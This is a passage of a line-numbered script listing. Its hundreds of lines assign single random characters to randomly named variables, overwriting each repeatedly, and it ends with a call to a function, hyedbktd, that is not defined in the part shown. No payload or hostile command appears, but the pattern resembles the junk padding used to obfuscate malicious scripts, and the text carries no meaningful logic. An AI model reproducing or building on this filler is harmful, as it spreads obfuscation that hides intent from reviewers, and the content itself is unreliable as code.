742 | nxqikmdbd = "J"; | |
743 | nxqikmdbd = "T"; | |
744 | nxqikmdbd = "K"; | |
745 | nxqikmdbd = "A"; | |
746 | nxqikmdbd = "f"; | |
747 | nxqikmdbd = "Q"; | |
748 | nxqikmdbd = "Y"; | |
749 | nxqikmdbd = "D"; | |
750 | nxqikmdbd = "X"; | |
751 | nxqikmdbd = "b"; | |
752 | nxqikmdbd = "x"; | |
753 | nxqikmdbd = "d"; | |
754 | nxqikmdbd = "y"; | |
755 | nxqikmdbd = "N"; | |
756 | nxqikmdbd = "k"; | |
757 | nxqikmdbd = "j"; | |
758 | nxqikmdbd = "P"; | |
759 | nxqikmdbd = "P"; | |
760 | nxqikmdbd = "Q"; | |
761 | nxqikmdbd = "b"; | |
762 | nxqikmdbd = "f"; | |
763 | nxqikmdbd = "x"; | |
764 | nxqikmdbd = "v"; | |
765 | nxqikmdbd = "F"; | |
766 | nxqikmdbd = "f"; | |
767 | nxqikmdbd = "K"; | |
768 | nxqikmdbd = "w"; | |
769 | nxqikmdbd = "t"; | |
770 | nxqikmdbd = "d"; | |
771 | nxqikmdbd = "k"; | |
772 | krepy = "v"; | |
773 | krepy = "P"; | |
774 | krepy = "x"; | |
775 | krepy = "e"; | |
776 | krepy = "n"; | |
777 | krepy = "Q"; | |
778 | krepy = "f"; | |
779 | krepy = "d"; | |
780 | krepy = "k"; | |
781 | krepy = "L"; | |
782 | krepy = "z"; | |
783 | krepy = "B"; | |
784 | krepy = "M"; | |
785 | krepy = "E"; | |
786 | vyibgor = "L"; | |
787 | vyibgor = "I"; | |
788 | vyibgor = "i"; | |
789 | vyibgor = "k"; | |
790 | vyibgor = "q"; | |
791 | vyibgor = "x"; | |
792 | vyibgor = "o"; | |
793 | vyibgor = "d"; | |
794 | vyibgor = "N"; | |
795 | vyibgor = "e"; | |
796 | vyibgor = "Q"; | |
797 | vyibgor = "N"; | |
798 | vyibgor = "g"; | |
799 | vyibgor = "J"; | |
800 | vyibgor = "e"; | |
801 | vyibgor = "C"; | |
802 | vyibgor = "G"; | |
803 | vyibgor = "e"; | |
804 | vyibgor = "z"; | |
805 | vyibgor = "p"; | |
806 | vyibgor = "d"; | |
807 | vyibgor = "t"; | |
808 | vyibgor = "H"; | |
809 | vyibgor = "E"; | |
810 | vyibgor = "W"; | |
811 | vyibgor = "p"; | |
812 | vyibgor = "E"; | |
813 | vyibgor = "x"; | |
814 | vyibgor = "K"; | |
815 | vyibgor = "n"; | |
816 | vyibgor = "X"; | |
817 | vyibgor = "N"; | |
818 | vyibgor = "u"; | |
819 | wwliywf = "A"; | |
820 | wwliywf = "f"; | |
821 | wwliywf = "e"; | |
822 | wwliywf = "f"; | |
823 | wwliywf = "e"; | |
824 | wwliywf = "c"; | |
825 | wwliywf = "h"; | |
826 | wwliywf = "w"; | |
827 | wwliywf = "c"; | |
828 | wwliywf = "5"; | |
829 | xcwjwuk = "n"; | |
830 | xcwjwuk = "j"; | |
831 | xcwjwuk = "B"; | |
832 | xcwjwuk = "s"; | |
833 | xcwjwuk = "D"; | |
834 | xcwjwuk = "u"; | |
835 | xcwjwuk = "Y"; | |
836 | xcwjwuk = "m"; | |
837 | xcwjwuk = "x"; | |
838 | xcwjwuk = "J"; | |
839 | xcwjwuk = "m"; | |
840 | xcwjwuk = "G"; | |
841 | xcwjwuk = "R"; | |
842 | xcwjwuk = "d"; | |
843 | xcwjwuk = "i"; | |
844 | xcwjwuk = "d"; | |
845 | xcwjwuk = "p"; | |
846 | xcwjwuk = "n"; | |
847 | xcwjwuk = "g"; | |
848 | xcwjwuk = "X"; | |
849 | xcwjwuk = "B"; | |
850 | xcwjwuk = "i"; | |
851 | xcwjwuk = "f"; | |
852 | xcwjwuk = "p"; | |
853 | xcwjwuk = "u"; | |
854 | xcwjwuk = "R"; | |
855 | xcwjwuk = ":"; | |
856 | bdgrx = "i"; | |
857 | bdgrx = "Q"; | |
858 | bdgrx = "7"; | |
859 | cbakzz = "s"; | |
860 | cbakzz = "s"; | |
861 | cbakzz = "C"; | |
862 | cbakzz = "A"; | |
863 | cbakzz = "I"; | |
864 | cbakzz = "f"; | |
865 | cbakzz = "N"; | |
866 | cbakzz = "p"; | |
867 | cbakzz = "P"; | |
868 | cbakzz = "Z"; | |
869 | cbakzz = "z"; | |
870 | cbakzz = "b"; | |
871 | cbakzz = "L"; | |
872 | cbakzz = "F"; | |
873 | cbakzz = "K"; | |
874 | cbakzz = "_"; | |
875 | hovnml = "v"; | |
876 | hovnml = "O"; | |
877 | hovnml = "U"; | |
878 | hovnml = "Z"; | |
879 | hovnml = "E"; | |
880 | hovnml = "T"; | |
881 | hovnml = "P"; | |
882 | hovnml = "S"; | |
883 | hovnml = "P"; | |
884 | hovnml = "V"; | |
885 | hovnml = "q"; | |
886 | hovnml = "y"; | |
887 | hovnml = "Y"; | |
888 | tkfqapi = "h"; | |
889 | tkfqapi = "V"; | |
890 | tkfqapi = "G"; | |
891 | tkfqapi = "M"; | |
892 | tkfqapi = "T"; | |
893 | tkfqapi = "O"; | |
894 | tkfqapi = "a"; | |
895 | tkfqapi = "F"; | |
896 | tkfqapi = "Y"; | |
897 | tkfqapi = "p"; | |
898 | tkfqapi = "r"; | |
899 | tkfqapi = "Q"; | |
900 | tkfqapi = "S"; | |
901 | tkfqapi = "I"; | |
902 | tkfqapi = "X"; | |
903 | tkfqapi = "B"; | |
904 | tkfqapi = "K"; | |
905 | tkfqapi = "E"; | |
906 | tkfqapi = "%"; | |
907 | rqara = "F"; | |
908 | rqara = "a"; | |
909 | rqara = "S"; | |
910 | rqara = "T"; | |
911 | rqara = "y"; | |
912 | rqara = "F"; | |
913 | rqara = "b"; | |
914 | rqara = "j"; | |
915 | rqara = "D"; | |
916 | rqara = "u"; | |
917 | rqara = "J"; | |
918 | rqara = "T"; | |
919 | rqara = "e"; | |
920 | rqara = "o"; | |
921 | rqara = "S"; | |
922 | rqara = "a"; | |
923 | rqara = "Y"; | |
924 | rqara = "C"; | |
925 | rqara = "e"; | |
926 | rqara = "K"; | |
927 | rqara = "O"; | |
928 | rqara = "H"; | |
929 | rqara = "r"; | |
930 | rqara = "c"; | |
931 | rqara = "R"; | |
932 | rqara = "u"; | |
933 | rqara = "l"; | |
934 | rqara = "I"; | |
935 | rqara = "-"; | |
936 | oyiqbsqc = "S"; | |
937 | oyiqbsqc = "V"; | |
938 | oyiqbsqc = "C"; | |
939 | oyiqbsqc = "Q"; | |
940 | oyiqbsqc = "V"; | |
941 | oyiqbsqc = "r"; | |
942 | oyiqbsqc = "C"; | |
943 | oyiqbsqc = "V"; | |
944 | oyiqbsqc = "I"; | |
945 | oyiqbsqc = "g"; | |
946 | oyiqbsqc = "j"; | |
947 | oyiqbsqc = "I"; | |
948 | oyiqbsqc = "v"; | |
949 | oyiqbsqc = "s"; | |
950 | oyiqbsqc = "q"; | |
951 | oyiqbsqc = "b"; | |
952 | oyiqbsqc = "J"; | |
953 | oyiqbsqc = "z"; | |
954 | oyiqbsqc = "s"; | |
955 | oyiqbsqc = "E"; | |
956 | oyiqbsqc = "j"; | |
957 | oyiqbsqc = "U"; | |
958 | oyiqbsqc = "K"; | |
959 | oyiqbsqc = "I"; | |
960 | oyiqbsqc = "K"; | |
961 | oyiqbsqc = "P"; | |
962 | oyiqbsqc = "F"; | |
963 | oyiqbsqc = "A"; | |
964 | oyiqbsqc = "b"; | |
965 | oyiqbsqc = "b"; | |
966 | oyiqbsqc = "E"; | |
967 | oyiqbsqc = "l"; | |
968 | oyiqbsqc = "e"; | |
969 | oyiqbsqc = "u"; | |
970 | oyiqbsqc = "h"; | |
971 | oyiqbsqc = "g"; | |
972 | oyiqbsqc = "f"; | |
973 | oyiqbsqc = "V"; | |
974 | oyiqbsqc = "f"; | |
975 | oyiqbsqc = "L"; | |
976 | oyiqbsqc = "f"; | |
977 | oyiqbsqc = "I"; | |
978 | ntqdtttr = "D"; | |
979 | ntqdtttr = "f"; | |
980 | ntqdtttr = "X"; | |
981 | ntqdtttr = "F"; | |
982 | ntqdtttr = "Y"; | |
983 | ntqdtttr = "s"; | |
984 | ntqdtttr = "K"; | |
985 | ntqdtttr = "u"; | |
986 | ntqdtttr = "U"; | |
987 | ntqdtttr = "j"; | |
988 | ntqdtttr = "R"; | |
989 | ntqdtttr = "z"; | |
990 | ntqdtttr = "M"; | |
991 | ntqdtttr = "e"; | |
992 | ntqdtttr = "F"; | |
993 | ntqdtttr = "M"; | |
994 | ntqdtttr = "Y"; | |
995 | ntqdtttr = "P"; | |
996 | ntqdtttr = "i"; | |
997 | ntqdtttr = "R"; | |
998 | ntqdtttr = "V"; | |
999 | ntqdtttr = "K"; | |
1000 | ntqdtttr = "q"; | |
1001 | ntqdtttr = "u"; | |
1002 | ntqdtttr = "Q"; | |
1003 | ntqdtttr = "c"; | |
1004 | ntqdtttr = "p"; | |
1005 | ntqdtttr = "r"; | |
1006 | ntqdtttr = "x"; | |
1007 | ntqdtttr = "j"; | |
1008 | ntqdtttr = "I"; | |
1009 | ntqdtttr = "d"; | |
1010 | ntqdtttr = "P"; | |
1011 | ntqdtttr = "e"; | |
1012 | ntqdtttr = "v"; | |
1013 | ntqdtttr = "v"; | |
1014 | ntqdtttr = "u"; | |
1015 | ntqdtttr = "P"; | |
1016 | ntqdtttr = "V"; | |
1017 | ntqdtttr = "Q"; | |
1018 | ntqdtttr = "Z"; | |
1019 | ntqdtttr = "h"; | |
1020 | fjvrtsytf = "k"; | |
1021 | fjvrtsytf = "F"; | |
1022 | fjvrtsytf = "c"; | |
1023 | fjvrtsytf = "V"; | |
1024 | fjvrtsytf = "Y"; | |
1025 | fjvrtsytf = "Z"; | |
1026 | fjvrtsytf = "l"; | |
1027 | fjvrtsytf = "P"; | |
1028 | fjvrtsytf = "Z"; | |
1029 | fjvrtsytf = "r"; | |
1030 | fjvrtsytf = "a"; | |
1031 | fjvrtsytf = "2"; | |
1032 | rzxexdoiy = "c"; | |
1033 | rzxexdoiy = "z"; | |
1034 | rzxexdoiy = "V"; | |
1035 | rzxexdoiy = "G"; | |
1036 | rzxexdoiy = "N"; | |
1037 | rzxexdoiy = "o"; | |
1038 | rzxexdoiy = "h"; | |
1039 | rzxexdoiy = "o"; | |
1040 | rzxexdoiy = "z"; | |
1041 | rzxexdoiy = "w"; | |
1042 | rzxexdoiy = "V"; | |
1043 | rzxexdoiy = "h"; | |
1044 | rzxexdoiy = "K"; | |
1045 | rzxexdoiy = "l"; | |
1046 | rzxexdoiy = "k"; | |
1047 | rzxexdoiy = "f"; | |
1048 | rzxexdoiy = "D"; | |
1049 | rzxexdoiy = "s"; | |
1050 | rzxexdoiy = "S"; | |
1051 | rzxexdoiy = "n"; | |
1052 | rzxexdoiy = "K"; | |
1053 | rzxexdoiy = "Q"; | |
1054 | rzxexdoiy = "T"; | |
1055 | rzxexdoiy = "p"; | |
1056 | rzxexdoiy = "L"; | |
1057 | yaursguxi = "Q"; | |
1058 | yaursguxi = "U"; | |
1059 | yaursguxi = "o"; | |
1060 | yaursguxi = "D"; | |
1061 | yaursguxi = "D"; | |
1062 | yaursguxi = "s"; | |
1063 | yaursguxi = "D"; | |
1064 | yaursguxi = "x"; | |
1065 | yaursguxi = "x"; | |
1066 | yaursguxi = "h"; | |
1067 | yaursguxi = "k"; | |
1068 | yaursguxi = "P"; | |
1069 | yaursguxi = "Q"; | |
1070 | yaursguxi = "o"; | |
1071 | yaursguxi = "n"; | |
1072 | yaursguxi = "f"; | |
1073 | yaursguxi = "T"; | |
1074 | yaursguxi = "G"; | |
1075 | yaursguxi = "t"; | |
1076 | vhojsvuo = "Z"; | |
1077 | vhojsvuo = "F"; | |
1078 | vhojsvuo = "l"; | |
1079 | vhojsvuo = "R"; | |
1080 | vhojsvuo = "M"; | |
1081 | vhojsvuo = "E"; | |
1082 | vhojsvuo = "j"; | |
1083 | vhojsvuo = "x"; | |
1084 | vhojsvuo = "o"; | |
1085 | vhojsvuo = "S"; | |
1086 | vhojsvuo = "E"; | |
1087 | vhojsvuo = "x"; | |
1088 | vhojsvuo = "T"; | |
1089 | vhojsvuo = "K"; | |
1090 | vhojsvuo = "V"; | |
1091 | vhojsvuo = "t"; | |
1092 | vhojsvuo = "Z"; | |
1093 | vhojsvuo = "E"; | |
1094 | vhojsvuo = "t"; | |
1095 | vhojsvuo = "L"; | |
1096 | vhojsvuo = "G"; | |
1097 | vhojsvuo = "G"; | |
1098 | vhojsvuo = "l"; | |
1099 | vhojsvuo = "g"; | |
1100 | vhojsvuo = "\\"; | |
1101 | aqwxlvw = "I"; | |
1102 | aqwxlvw = "U"; | |
1103 | aqwxlvw = "F"; | |
1104 | aqwxlvw = "a"; | |
1105 | aqwxlvw = "z"; | |
1106 | aqwxlvw = "R"; | |
1107 | aqwxlvw = "i"; | |
1108 | aqwxlvw = "L"; | |
1109 | aqwxlvw = "s"; | |
1110 | aqwxlvw = "X"; | |
1111 | aqwxlvw = "e"; | |
1112 | aqwxlvw = "Q"; | |
1113 | aqwxlvw = "j"; | |
1114 | aqwxlvw = "i"; | |
1115 | aqwxlvw = "M"; | |
1116 | aqwxlvw = "X"; | |
1117 | aqwxlvw = "M"; | |
1118 | aqwxlvw = "B"; | |
1119 | aqwxlvw = "w"; | |
1120 | aqwxlvw = "v"; | |
1121 | aqwxlvw = "z"; | |
1122 | aqwxlvw = "x"; | |
1123 | aqwxlvw = "p"; | |
1124 | aqwxlvw = "Q"; | |
1125 | aqwxlvw = "m"; | |
1126 | aqwxlvw = "K"; | |
1127 | aqwxlvw = "G"; | |
1128 | aqwxlvw = "D"; | |
1129 | aqwxlvw = "F"; | |
1130 | aqwxlvw = "S"; | |
1131 | aqwxlvw = "w"; | |
1132 | aqwxlvw = "d"; | |
1133 | aqwxlvw = "L"; | |
1134 | aqwxlvw = "e"; | |
1135 | aqwxlvw = "E"; | |
1136 | aqwxlvw = "H"; | |
1137 | aqwxlvw = "F"; | |
1138 | aqwxlvw = "p"; | |
1139 | aqwxlvw = "S"; | |
1140 | aqwxlvw = "g"; | |
1141 | aqwxlvw = "c"; | |
1142 | aqwxlvw = "c"; | |
1143 | xltor = "L"; | |
1144 | xltor = "q"; | |
1145 | xltor = "y"; | |
1146 | xltor = "q"; | |
1147 | xltor = "M"; | |
1148 | xltor = "L"; | |
1149 | xltor = "P"; | |
1150 | xltor = "C"; | |
1151 | xltor = "O"; | |
1152 | xltor = "c"; | |
1153 | xltor = "H"; | |
1154 | xltor = "u"; | |
1155 | xltor = "o"; | |
1156 | xltor = "u"; | |
1157 | xltor = "u"; | |
1158 | xltor = "p"; | |
1159 | xltor = "B"; | |
1160 | xltor = "Y"; | |
1161 | xltor = "M"; | |
1162 | xltor = "Y"; | |
1163 | xltor = "f"; | |
1164 | xltor = "r"; | |
1165 | xltor = "g"; | |
1166 | xltor = "B"; | |
1167 | xltor = "Z"; | |
1168 | xltor = "Z"; | |
1169 | xltor = "n"; | |
1170 | xltor = "W"; | |
1171 | xltor = "k"; | |
1172 | xltor = "l"; | |
1173 | xltor = "P"; | |
1174 | xltor = "H"; | |
1175 | xltor = "z"; | |
1176 | xltor = "L"; | |
1177 | xltor = "I"; | |
1178 | xltor = "p"; | |
1179 | xltor = "o"; | |
1180 | xltor = "H"; | |
1181 | xltor = "8"; | |
1182 | aygqrgzx = "y"; | |
1183 | aygqrgzx = "V"; | |
1184 | aygqrgzx = "R"; | |
1185 | aygqrgzx = "M"; | |
1186 | aygqrgzx = "L"; | |
1187 | aygqrgzx = "H"; | |
1188 | aygqrgzx = "l"; | |
1189 | aygqrgzx = "D"; | |
1190 | aygqrgzx = "O"; | |
1191 | aygqrgzx = "m"; | |
1192 | aygqrgzx = "R"; | |
1193 | aygqrgzx = "R"; | |
1194 | aygqrgzx = "H"; | |
1195 | aygqrgzx = "f"; | |
1196 | aygqrgzx = "g"; | |
1197 | aygqrgzx = "I"; | |
1198 | aygqrgzx = "d"; | |
1199 | aygqrgzx = "C"; | |
1200 | aygqrgzx = "I"; | |
1201 | aygqrgzx = "T"; | |
1202 | aygqrgzx = "X"; | |
1203 | aygqrgzx = "L"; | |
1204 | aygqrgzx = "D"; | |
1205 | aygqrgzx = "m"; | |
1206 | aygqrgzx = "N"; | |
1207 | aygqrgzx = "T"; | |
1208 | aygqrgzx = "Q"; | |
1209 | aygqrgzx = "f"; | |
1210 | gyjhydex = "v"; | |
1211 | gyjhydex = "o"; | |
1212 | gyjhydex = "G"; | |
1213 | gyjhydex = "D"; | |
1214 | gyjhydex = "g"; | |
1215 | gyjhydex = "D"; | |
1216 | gyjhydex = "Z"; | |
1217 | gyjhydex = "R"; | |
1218 | gyjhydex = "T"; | |
1219 | jbjfbj = "Z"; | |
1220 | jbjfbj = "x"; | |
1221 | jbjfbj = "X"; | |
1222 | jbjfbj = "L"; | |
1223 | jbjfbj = "k"; | |
1224 | jbjfbj = "Z"; | |
1225 | jbjfbj = "k"; | |
1226 | jbjfbj = "o"; | |
1227 | jbjfbj = "G"; | |
1228 | jbjfbj = "c"; | |
1229 | jbjfbj = "t"; | |
1230 | jbjfbj = "j"; | |
1231 | jbjfbj = "e"; | |
1232 | jbjfbj = "u"; | |
1233 | jbjfbj = "M"; | |
1234 | jbjfbj = "R"; | |
1235 | jbjfbj = "k"; | |
1236 | jbjfbj = "u"; | |
1237 | jbjfbj = "C"; | |
1238 | jbjfbj = "m"; | |
1239 | jbjfbj = "A"; | |
1240 | jbjfbj = "X"; | |
1241 | jbjfbj = "i"; | |
1242 | jbjfbj = "l"; | |
1243 | jbjfbj = "u"; | |
1244 | jbjfbj = "s"; | |
1245 | jbjfbj = "o"; | |
1246 | jbjfbj = "F"; | |
1247 | jbjfbj = "l"; | |
1248 | jbjfbj = "x"; | |
1249 | jbjfbj = "P"; | |
1250 | jbjfbj = "D"; | |
1251 | jbjfbj = "I"; | |
1252 | jbjfbj = "U"; | |
1253 | jbjfbj = "M"; | |
1254 | jbjfbj = "M"; | |
1255 | jbjfbj = "K"; | |
1256 | jbjfbj = "z"; | |
1257 | jbjfbj = "G"; | |
1258 | jbjfbj = "v"; | |
1259 | jbjfbj = "Z"; | |
1260 | jbjfbj = "H"; | |
1261 | jbjfbj = "i"; | |
1262 | jbjfbj = "f"; | |
1263 | jbjfbj = "N"; | |
1264 | sjzvvpxct = "a"; | |
1265 | sjzvvpxct = "k"; | |
1266 | sjzvvpxct = "A"; | |
1267 | sjzvvpxct = "v"; | |
1268 | sjzvvpxct = "n"; | |
1269 | sjzvvpxct = "w"; | |
1270 | sjzvvpxct = "v"; | |
1271 | sjzvvpxct = "y"; | |
1272 | sjzvvpxct = "E"; | |
1273 | sjzvvpxct = "L"; | |
1274 | sjzvvpxct = "f"; | |
1275 | sjzvvpxct = "f"; | |
1276 | sjzvvpxct = "l"; | |
1277 | sjzvvpxct = "P"; | |
1278 | sfdvicmp = "o"; | |
1279 | sfdvicmp = "R"; | |
1280 | sfdvicmp = "j"; | |
1281 | sfdvicmp = "v"; | |
1282 | sfdvicmp = "l"; | |
1283 | sfdvicmp = "a"; | |
1284 | sfdvicmp = "A"; | |
1285 | sfdvicmp = "f"; | |
1286 | sfdvicmp = "p"; | |
1287 | sfdvicmp = "Q"; | |
1288 | sfdvicmp = "b"; | |
1289 | sfdvicmp = "s"; | |
1290 | sfdvicmp = "i"; | |
1291 | sfdvicmp = "j"; | |
1292 | sfdvicmp = "a"; | |
1293 | sfdvicmp = "a"; | |
1294 | sfdvicmp = "M"; | |
1295 | sfdvicmp = "O"; | |
1296 | sfdvicmp = "e"; | |
1297 | sfdvicmp = "h"; | |
1298 | sfdvicmp = "w"; | |
1299 | sfdvicmp = "N"; | |
1300 | sfdvicmp = "X"; | |
1301 | sfdvicmp = "V"; | |
1302 | sfdvicmp = "u"; | |
1303 | sfdvicmp = "q"; | |
1304 | sfdvicmp = "O"; | |
1305 | sfdvicmp = "S"; | |
1306 | sfdvicmp = "l"; | |
1307 | sfdvicmp = "n"; | |
1308 | sfdvicmp = "E"; | |
1309 | sfdvicmp = "P"; | |
1310 | sfdvicmp = "/"; | |
1311 | ytzmu = "A"; | |
1312 | ytzmu = "N"; | |
1313 | ytzmu = "e"; | |
1314 | ytzmu = "S"; | |
1315 | ytzmu = "c"; | |
1316 | ytzmu = "d"; | |
1317 | ytzmu = "g"; | |
1318 | ytzmu = "U"; | |
1319 | ytzmu = "x"; | |
1320 | xzdwc = "p"; | |
1321 | xzdwc = "q"; | |
1322 | xzdwc = "M"; | |
1323 | xzdwc = "M"; | |
1324 | xzdwc = "g"; | |
1325 | xzdwc = "c"; | |
1326 | xzdwc = "e"; | |
1327 | xzdwc = "c"; | |
1328 | xzdwc = "y"; | |
1329 | xzdwc = "D"; | |
1330 | xzdwc = "k"; | |
1331 | xzdwc = "h"; | |
1332 | xzdwc = "S"; | |
1333 | xzdwc = "T"; | |
1334 | xzdwc = "o"; | |
1335 | xzdwc = "Y"; | |
1336 | xzdwc = "G"; | |
1337 | xzdwc = "d"; | |
1338 | xzdwc = "P"; | |
1339 | xzdwc = "r"; | |
1340 | xzdwc = "R"; | |
1341 | xzdwc = "Z"; | |
1342 | xzdwc = "R"; | |
1343 | xzdwc = "T"; | |
1344 | xzdwc = "q"; | |
1345 | ozwsamu = "f"; | |
1346 | ozwsamu = "S"; | |
1347 | ozwsamu = "x"; | |
1348 | ozwsamu = "T"; | |
1349 | ozwsamu = "B"; | |
1350 | ozwsamu = "S"; | |
1351 | ozwsamu = "l"; | |
1352 | ozwsamu = "Y"; | |
1353 | ozwsamu = "Q"; | |
1354 | ozwsamu = "i"; | |
1355 | ozwsamu = "L"; | |
1356 | ozwsamu = "I"; | |
1357 | ozwsamu = "K"; | |
1358 | ozwsamu = "y"; | |
1359 | ozwsamu = "b"; | |
1360 | ozwsamu = "r"; | |
1361 | ozwsamu = "Y"; | |
1362 | ozwsamu = "d"; | |
1363 | ozwsamu = "a"; | |
1364 | ozwsamu = "C"; | |
1365 | ozwsamu = "j"; | |
1366 | ozwsamu = "u"; | |
1367 | ozwsamu = "D"; | |
1368 | ozwsamu = "s"; | |
1369 | ozwsamu = "D"; | |
1370 | ozwsamu = "y"; | |
1371 | ozwsamu = "L"; | |
1372 | ozwsamu = "U"; | |
1373 | ozwsamu = "E"; | |
1374 | ozwsamu = "H"; | |
1375 | ozwsamu = "W"; | |
1376 | ozwsamu = "g"; | |
1377 | ozwsamu = "1"; | |
1378 | wvfqmpmlx = "n"; | |
1379 | wvfqmpmlx = "F"; | |
1380 | wvfqmpmlx = "E"; | |
1381 | wvfqmpmlx = "V"; | |
1382 | wvfqmpmlx = "W"; | |
1383 | wvfqmpmlx = "Q"; | |
1384 | wvfqmpmlx = "p"; | |
1385 | wvfqmpmlx = "p"; | |
1386 | qlitcs = "Y"; | |
1387 | qlitcs = "g"; | |
1388 | qlitcs = "m"; | |
1389 | qlitcs = "G"; | |
1390 | qlitcs = "c"; | |
1391 | qlitcs = "z"; | |
1392 | qlitcs = "u"; | |
1393 | qlitcs = "a"; | |
1394 | bzovzzmgj = "m"; | |
1395 | bzovzzmgj = "w"; | |
1396 | bzovzzmgj = "y"; | |
1397 | bzovzzmgj = "k"; | |
1398 | bzovzzmgj = "c"; | |
1399 | bzovzzmgj = "L"; | |
1400 | bzovzzmgj = "Y"; | |
1401 | bzovzzmgj = "H"; | |
1402 | bzovzzmgj = "g"; | |
1403 | bzovzzmgj = "x"; | |
1404 | bzovzzmgj = "Q"; | |
1405 | bzovzzmgj = "T"; | |
1406 | bzovzzmgj = "b"; | |
1407 | bzovzzmgj = "b"; | |
1408 | bzovzzmgj = "Z"; | |
1409 | bzovzzmgj = "I"; | |
1410 | bzovzzmgj = "a"; | |
1411 | bzovzzmgj = "F"; | |
1412 | bzovzzmgj = "H"; | |
1413 | bzovzzmgj = "x"; | |
1414 | bzovzzmgj = "M"; | |
1415 | bzovzzmgj = "B"; | |
1416 | bzovzzmgj = "P"; | |
1417 | bzovzzmgj = "Y"; | |
1418 | bzovzzmgj = "c"; | |
1419 | bzovzzmgj = "P"; | |
1420 | bzovzzmgj = "C"; | |
1421 | bzovzzmgj = "U"; | |
1422 | bdxybxiv = "t"; | |
1423 | bdxybxiv = "S"; | |
1424 | bdxybxiv = "Y"; | |
1425 | bdxybxiv = "H"; | |
1426 | bdxybxiv = "X"; | |
1427 | bdxybxiv = "e"; | |
1428 | bdxybxiv = "A"; | |
1429 | bdxybxiv = "Q"; | |
1430 | bdxybxiv = "Q"; | |
1431 | bdxybxiv = "W"; | |
1432 | bdxybxiv = "w"; | |
1433 | bdxybxiv = "@"; | |
1434 | jzrwvpeif = "G"; | |
1435 | jzrwvpeif = "N"; | |
1436 | jzrwvpeif = "p"; | |
1437 | jzrwvpeif = "z"; | |
1438 | jzrwvpeif = "o"; | |
1439 | jzrwvpeif = "X"; | |
1440 | jzrwvpeif = "q"; | |
1441 | jzrwvpeif = "D"; | |
1442 | jzrwvpeif = "n"; | |
1443 | jzrwvpeif = "Q"; | |
1444 | jzrwvpeif = "z"; | |
1445 | jzrwvpeif = "w"; | |
1446 | jzrwvpeif = "M"; | |
1447 | jzrwvpeif = "w"; | |
1448 | jzrwvpeif = "j"; | |
1449 | jzrwvpeif = "K"; | |
1450 | jyivric = "0"; | |
1451 | kryeeb = "O"; | |
1452 | hyedbktd ( ); |
|